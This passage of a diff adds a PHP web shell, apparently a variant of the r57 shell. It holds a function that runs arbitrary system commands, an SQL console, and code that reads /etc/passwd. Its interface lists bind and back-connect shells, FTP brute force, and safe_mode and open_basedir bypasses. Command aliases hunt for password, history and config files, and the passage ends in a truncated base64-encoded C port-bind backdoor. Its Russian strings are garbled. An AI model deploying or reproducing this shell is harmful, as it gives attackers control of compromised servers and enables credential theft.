"<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; + switch($sql->query($query)) + { + case '0': + echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; + break; + case '1': + if($sql->get_result()) + { + echo "<table width=100%>"; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#000000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); + echo "<tr><td bgcolor=#000000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); + echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; + } + echo "</table>"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; + break; + } + } + } + } + } + echo "<br><form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center>"; + echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; + echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(__FILE__); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=Verdana size=-2 color=yellow><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=Verdana size=-2 color=yellow><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-1><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=Verdana size=-2 color=yellow><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'??????????? ???????', +'ru_text2' =>'?????????? ?????? ?? ???????', +'ru_text3' =>'????????? ???????', +'ru_text4' =>'??????? ??????????', +'ru_text5' =>'???????? ?????? ?? ??????', +'ru_text6' =>'????????? ????', +'ru_text7' =>'??????', +'ru_text8' =>'???????? ?????', +'ru_butt1' =>'?????????', +'ru_butt2' =>'?????????', +'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', +'ru_text10'=>'??????? ????', +'ru_text11'=>'?????? ??? ???????', +'ru_butt3' =>'???????', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-?????', +'ru_text14'=>'????', +'ru_butt4' =>'?????????', +'ru_text15'=>'???????? ?????? ? ?????????? ???????', +'ru_text16'=>'????????????', +'ru_text17'=>'????????? ????', +'ru_text18'=>'????????? ????', +'ru_text19'=>'Exploits', +'ru_text20'=>'????????????', +'ru_text21'=>'????? ???', +'ru_text22'=>'datapipe', +'ru_text23'=>'????????? ????', +'ru_text24'=>'????????? ????', +'ru_text25'=>'????????? ????', +'ru_text26'=>'????????????', +'ru_butt5' =>'?????????', +'ru_text28'=>'?????? ? safe_mode', +'ru_text29'=>'?????? ????????', +'ru_butt6' =>'???????', +'ru_text30'=>'???????? ?????', +'ru_butt7' =>'???????', +'ru_text31'=>'???? ?? ??????', +'ru_text32'=>'?????????? PHP ????', +'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', +'ru_butt8' =>'?????????', +'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', +'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', +'ru_text36'=>'???? . ???????', +'ru_text37'=>'?????', +'ru_text38'=>'??????', +'ru_text39'=>'????', +'ru_text40'=>'???? ??????? ???? ??????', +'ru_butt9' =>'????', +'ru_text41'=>'????????? ? ?????', +'ru_text42'=>'?????????????? ?????', +'ru_text43'=>'????????????? ????', +'ru_butt10'=>'?????????', +'ru_butt11'=>'?????????????', +'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', +'ru_text45'=>'???? ????????', +'ru_text46'=>'???????? phpinfo()', +'ru_text47'=>'???????? ???????? php.ini', +'ru_text48'=>'???????? ????????? ??????', +'ru_text49'=>'???????? ??????? ? ???????', +'ru_text50'=>'?????????? ? ??????????', +'ru_text51'=>'?????????? ? ??????', +'ru_text52'=>'????? ??? ??????', +'ru_text53'=>'?????? ? ?????', +'ru_text54'=>'????? ?????? ? ??????', +'ru_butt12'=>'?????', +'ru_text55'=>'?????? ? ??????', +'ru_text56'=>'?????? ?? ???????', +'ru_text57'=>'???????/??????? ????/??????????', +'ru_text58'=>'???', +'ru_text59'=>'????', +'ru_text60'=>'??????????', +'ru_butt13'=>'???????/???????', +'ru_text61'=>'???? ??????', +'ru_text62'=>'?????????? ???????', +'ru_text63'=>'???? ??????', +'ru_text64'=>'?????????? ???????', +'ru_text65'=>'???????', +'ru_text66'=>'???????', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'???????', +'ru_text69'=>'????????1', +'ru_text70'=>'????????2', +'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", +'ru_text72'=>'????? ??? ??????', +'ru_text73'=>'?????? ? ?????', +'ru_text74'=>'?????? ? ??????', +'ru_text75'=>'* ????? ???????????? ?????????? ?????????', +'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', +'ru_text80'=>'???', +'ru_text81'=>'????', +'ru_text82'=>'???? ??????', +'ru_text83'=>'?????????? SQL ???????', +'ru_text84'=>'SQL ??????', +'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', +'ru_text86'=>'?????????? ????? ? ???????', +'ru_butt14'=>'???????', +'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????', +'ru_text88'=>'FTP-??????:????', +'ru_text89'=>'???? ?? ftp ???????', +'ru_text90'=>'????? ????????', +'ru_text91'=>'???????????? ?', +'ru_text92'=>'??? ?????????', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-????????', +'ru_text95'=>'?????? ?????????????', +'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', +'ru_text97'=>'????????? ??????????: ', +'ru_text98'=>'??????? ???????????: ', +'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', +'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', +'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????', +'ru_text102'=>'?????', +'ru_text103'=>'???????? ??????', +'ru_text104'=>'???????? ????? ?? ???????? ????', +'ru_text105'=>'????', +'ru_text106'=>'??', +'ru_text107'=>'????', +'ru_butt15'=>'?????????', +'ru_text108'=>'????? ??????', +'ru_text109'=>'????????', +'ru_text110'=>'??????????', +'ru_text111'=>'SQL-?????? : ????', +'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail', +'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list', +'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body', +'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()', +'ru_text116'=>'?????????? ????', +'ru_text117'=>'?', +'ru_text118'=>'???? ??????????', +'ru_text119'=>'?? ??????? ??????????? ????', +'ru_err0'=>'??????! ?? ???? ???????? ? ???? ', +'ru_err1'=>'??????! ?? ???? ????????? ???? ', +'ru_err2'=>'??????! ?? ??????? ??????? ', +'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????', +'ru_err4'=>'?????? ??????????? ?? ftp ???????', +'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????', +'ru_err6'=>'??????! ?? ??????? ????????? ??????', +'ru_err7'=>'?????? ??????????', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Jalankan command di server', +'eng_text3' =>'Jalankan Perintah', +'eng_text4' =>'Directory Sekarang', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subject', +'eng_butt15'=>'Kirim', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', +'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()', +'eng_text116'=>'Copy from', +'eng_text117'=>'to', +'eng_text118'=>'File copied', +'eng_text119'=>'Cant copy file', +'eng_err0'=>'Error! Can\'t write in file ', +'eng_err1'=>'Error! Can\'t read file ', +'eng_err2'=>'Error! Can\'t create ', +'eng_err3'=>'Error! Can\'t connect to ftp', +'eng_err4'=>'Error! Can\'t login on ftp server', +'eng_err5'=>'Error! Can\'t change dir on ftp', +'eng_err6'=>'Error! Can\'t sent mail', +'eng_err7'=>'Mail send', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'Cari directory perm 777'=>'find -perm 777 -type d -ls', +'Lihat Domain-domain dalam satu Mesin'=>'ls -alF /etc/vdomainaliases -ls', +'Cek IP Servers'=>'/sbin/ifconfig | grep inet', +'Masuk Direktory /tmp/.bash'=>'cd /tmp;mkdir .bash;cd /.bash;ls -al', +'Cek User SSH'=>'cat /sbin/ifconfig | /bash', +'Cek Port Open Servers'=>'netstat -plnat 22', +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#000000><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#000000>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Webdings color=red>3</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=green>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=Verdana size=-3><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $unix = 0; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= (!$unix)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-3>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-3><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function err($n,$txt='') +{ +echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=yellow face=Verdana size=-2><div align=center><b>'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '</b></div></font></td></tr></table>'; +return null; +} +function perms($mode) +{ +if (!$GLOBALS['unix']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value,$checked=0) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\""; + if($checked) $ret .= " checked"; + return $ret.">"; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK 